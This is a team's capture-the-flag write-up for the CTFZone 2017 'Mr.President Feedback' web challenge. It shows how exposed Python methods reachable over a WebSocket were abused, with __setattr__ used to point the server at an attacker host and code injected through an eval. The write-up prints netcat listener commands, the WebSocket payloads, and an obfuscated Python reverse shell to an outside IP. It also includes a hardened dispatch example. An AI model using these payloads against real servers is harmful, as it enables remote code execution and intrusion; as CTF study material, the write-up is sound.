MrPresidentFeedback -- CTFZone 2017
Mr.President Feedback #Web/Pwn #CodeInjection #python #shell
By: Diogo, Filipe, Vasco and João
Description:
31 solves, 460 points
One of the candidates has just launched a feedback form for the electors. We need to analyze data from that server to gain an advantage in the upcoming debates. If you get sensitive data, we will pay a lot. Feedback form -> website
The website consisted of a web client that sends requests to a server over a WebSocket, plus a fake submit method.
In the WebSocket traffic we could see the messages sent to the server:
{"method":"generate"}
and
{"method":"check","args":["1872b9691b5675183546f11b133aa30a","chaptaSolution"]}
Exposed Object methods
After this we tried to find more methods.
If we send {"method": "__dir__"}
we get back a list of all the object's attributes and methods, as shown below:
["_port",
"_table",
"_sock",
"__module__",
"_last",
"__init__",
"reconnect",
"operations",
"generate",
"check",
"help",
"__dict__",
"__weakref__",
"__doc__",
"__repr__",
"__hash__",
"__str__",
"__getattribute__",
"__setattr__",
"__delattr__",
"__lt__",
"__le__",
"__eq__",
"__ne__",
"__gt__",
"__ge__",
"__new__",
"__reduce_ex__",
"__reduce__",
"__subclasshook__",
"__init_subclass__",
"__format__",
"__sizeof__",
"__dir__",
"__class__"]
Abusing exposed methods
With the `__setattr__` method we could change the IP and port of the server the object talks to; we then request `reconnect` and it is bound to our own server.
When we send {"method":"generate"} to the server, it asks our server for the available operations, separated by spaces. When we reply with a list of operations, the server does something like:
eval("1 "+rand(operationsReceived)+"2")
and asks us to solve the captcha for that operation. Because the operation string goes straight into the eval,
we could inject code by sending it as an operation. Notice, however, that the code can't contain spaces, because a space is what the server splits the list of possible operations on.
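As an added illustration (not the challenge's real server code, which the writeup does not show), here is an assumed reconstruction of the dispatch pattern that makes `__dir__` and `__setattr__` reachable, beside a hardened version that allowlists the two intended methods and computes the captcha arithmetic from a fixed operator table instead of eval:

```python
import json
import operator


class VulnerableFeedbackHandler:
    """Assumed reconstruction of the server's dispatch pattern (not the page's code)."""

    def __init__(self):
        self._server = "127.0.0.1"  # constructed defaults
        self._port = 22222

    def generate(self):
        return "captcha-token"  # placeholder for the real captcha generation

    def check(self, token, solution):
        return False

    def dispatch(self, raw):
        msg = json.loads(raw)
        # Whatever name the client supplies reaches getattr, so __dir__ and
        # __setattr__ are just as reachable as generate and check.
        return getattr(self, msg["method"])(*msg.get("args", []))


class HardenedFeedbackHandler(VulnerableFeedbackHandler):
    # Explicit allowlist of the only names a client may invoke.
    EXPOSED = frozenset({"generate", "check"})
    # Arithmetic for the captcha comes from a fixed table, not from eval().
    OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}

    def dispatch(self, raw):
        msg = json.loads(raw)
        method = msg.get("method")
        if method not in self.EXPOSED:
            raise PermissionError(f"method not exposed: {method!r}")
        args = msg.get("args", [])
        if not isinstance(args, list):
            raise ValueError("args must be a JSON array")
        return getattr(self, method)(*args)

    def compute(self, left, op, right):
        # An unknown operator string is rejected instead of being evaluated.
        if op not in self.OPS:
            raise ValueError(f"unsupported operation: {op!r}")
        return self.OPS[op](left, right)
```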
EXPLOIT
- PREPARE OPERATIONS SERVER:
  - Get IP:
    > curl -s checkip.dyndns.org
  - Run Netcat listener:
    > nc -l -p 22222
- PREPARE REVERSE SHELL SERVER:
  - Get IP:
    > curl -s checkip.dyndns.org
  - Run Netcat listener:
    > nc -l -p 9999
- Use the exposed methods to change the destination server with WebSocket requests:
  {"method":"__setattr__", "args":["_port",22222]}
  {"method":"__setattr__", "args":["_server","193.136.128.103"]}
  {"method":"reconnect"}
  {"method":"generate"}
- When we receive `supported_operations` on port 22222, we send our reverse shell, which will be executed in the eval:
  +__import__('subprocess').call(['python','-c','import'+chr(32)+'socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('+chr(34)+'193.136.128.108'+chr(34)+',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['+chr(34)+'/bin/sh'+chr(34)+','+chr(34)+'-i'+chr(34)+']);'])#
- Send something on port 22222: